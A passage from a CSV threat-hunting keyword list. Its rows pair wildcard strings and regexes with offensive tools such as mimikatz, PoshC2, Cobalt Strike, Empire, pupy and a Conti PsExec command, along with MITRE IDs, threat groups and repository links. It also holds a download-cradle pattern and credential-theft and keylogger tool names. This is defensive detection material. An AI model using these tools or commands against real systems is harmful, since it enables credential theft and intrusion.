keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","60269" "*standard::log*",".{0,1000}standard\:\:log.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","60270" "*standard::sleep*",".{0,1000}standard\:\:sleep.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","60271" "*standard::version*",".{0,1000}standard\:\:version.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","60272" "*standin --asrep*",".{0,1000}standin\s\-\-asrep.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","60273" "*standin 
--dc*",".{0,1000}standin\s\-\-dc.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","60274" "*standin --delegation*",".{0,1000}standin\s\-\-delegation.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","60275" "*standin --group *Domain Admins*",".{0,1000}standin\s\-\-group\s.{0,1000}Domain\sAdmins.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - 
T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","60276" "*standin --object *",".{0,1000}standin\s\-\-object\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","60277" "*standin --spn*",".{0,1000}standin\s\-\-spn.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - 
Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","60278" "*StandIn.exe --*",".{0,1000}StandIn\.exe\s\-\-.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","60279" "*StandIn.exe"" --*",".{0,1000}StandIn\.exe\""\s\-\-.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","60280" "*StandIn_v12_Net35_45.zip*",".{0,1000}StandIn_v12_Net35_45\.zip.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","60281" "*StandIn_v13_Net35_45.zip*",".{0,1000}StandIn_v13_Net35_45\.zip.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","60282" "*Stardust.Win32.NtProtectVirtualMemory(*",".{0,1000}Stardust\.Win32\.NtProtectVirtualMemory\(.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - 
T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","N/A","10","10","1193","193","2025-03-21T11:41:09Z","2022-02-20T01:23:35Z","60286" "*Stardust.Win32.RtlAllocateHeap(*",".{0,1000}Stardust\.Win32\.RtlAllocateHeap\(.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","N/A","10","10","1193","193","2025-03-21T11:41:09Z","2022-02-20T01:23:35Z","60287" "*STARDUST_MACROS_H*",".{0,1000}STARDUST_MACROS_H.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","N/A","10","10","1193","193","2025-03-21T11:41:09Z","2022-02-20T01:23:35Z","60288" "*stardust50578/rdp_brute*",".{0,1000}stardust50578\/rdp_brute.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","Dispossessor","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","1","N/A","N/A","8","1","2","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z","60289" "*StarfireLab/SharpWeb*",".{0,1000}StarfireLab\/SharpWeb.{0,1000}","offensive_tool_keyword","SharpWeb","SharpWeb - to export browser data including passwords - history - cookies - bookmarks and download records","T1555.003 - T1539 - T1602 - T1074.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/StarfireLab/SharpWeb","1","1","N/A","N/A","10","8","703","79","2024-11-15T07:05:34Z","2023-10-09T06:48:23Z","60290" "*Staring Nemesis Bot. 
Teamserver*",".{0,1000}Staring\sNemesis\sBot\.\sTeamserver.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","60291" "*StarkillerSnackbar.vue*",".{0,1000}StarkillerSnackbar\.vue.{0,1000}","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","10","1461","206","2025-03-25T03:30:16Z","2020-03-09T05:48:58Z","60292" "*staroffice2john.py*",".{0,1000}staroffice2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - 
advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","60293" "*Start Menu\Programs\Startup\Loader.exe*",".{0,1000}Start\sMenu\\Programs\\Startup\\Loader\.exe.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","N/A","N/A","10","1","85","24","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z","60297" "*start ms-appinstaller://?source=https://raw.githubusercontent.com*",".{0,1000}start\sms\-appinstaller\:\/\/\?source\=https\:\/\/raw\.githubusercontent\.com.{0,1000}","offensive_tool_keyword","ms-appinstaller","download cradle with appinstaller from github","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","lolbin","10","10","N/A","N/A","N/A","N/A","60298" "*start PsExec.exe -d *",".{0,1000}start\sPsExec\.exe\s\-d\s.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","60299" "*start stinger ",".{0,1000}start\sstinger\s","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - 
menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","0","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","60300" "*Start the Tor2web proxy*",".{0,1000}Start\sthe\sTor2web\sproxy.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","60301" "*'start/stop iptables port reuse'*",".{0,1000}\'start\/stop\siptables\sport\sreuse\'.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","60303" "*start_mythic_server.sh*",".{0,1000}start_mythic_server\.sh.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","60304" "*start_nbnsspoof*",".{0,1000}start_nbnsspoof.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - 
T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","60305" "*start_phpsploit_connected.sh*",".{0,1000}start_phpsploit_connected\.sh.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","1","N/A","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","60306" "*Start-ACLsAnalysis -Domain*",".{0,1000}Start\-ACLsAnalysis\s\-Domain.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","60310" "*startanotherimplant*",".{0,1000}startanotherimplant.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - 
Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","60311" "*Start-CaptureServer.ps1*",".{0,1000}Start\-CaptureServer\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","60312" "*Start-CaptureServer.ps1*",".{0,1000}Start\-CaptureServer\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","60313" "*startdaisy*",".{0,1000}startdaisy.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - 
HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","60314" "*Start-DLLScan *",".{0,1000}Start\-DLLScan\s.{0,1000}","offensive_tool_keyword","DLLHound","Find potential DLL Sideloads on your windows computer","T1574.001 - T1574.002","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/ajm4n/DLLHound","1","0","N/A","N/A","7","3","201","22","2025-01-12T02:28:22Z","2024-12-20T02:26:16Z","60315" "*Start-domainACLsAnalysis*",".{0,1000}Start\-domainACLsAnalysis.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","60316" "*Started spying using MyAutomationEventHandler*",".{0,1000}Started\sspying\susing\sMyAutomationEventHandler.{0,1000}","offensive_tool_keyword","Spyndicapped","COM ViewLogger - keylogger","T1574.001 - T1574.002 - T1574.009","TA0006","N/A","N/A","Credential Access","https://github.com/CICADA8-Research/Spyndicapped","1","0","#content","N/A","10","4","356","50","2025-01-06T07:31:29Z","2024-12-25T11:47:39Z","60317" "*Starting AddUserToAdminGroup for user:*",".{0,1000}Starting\sAddUserToAdminGroup\sfor\suser\:.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#content","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","60318" "*Starting AutoPwnKey Port Scanner 
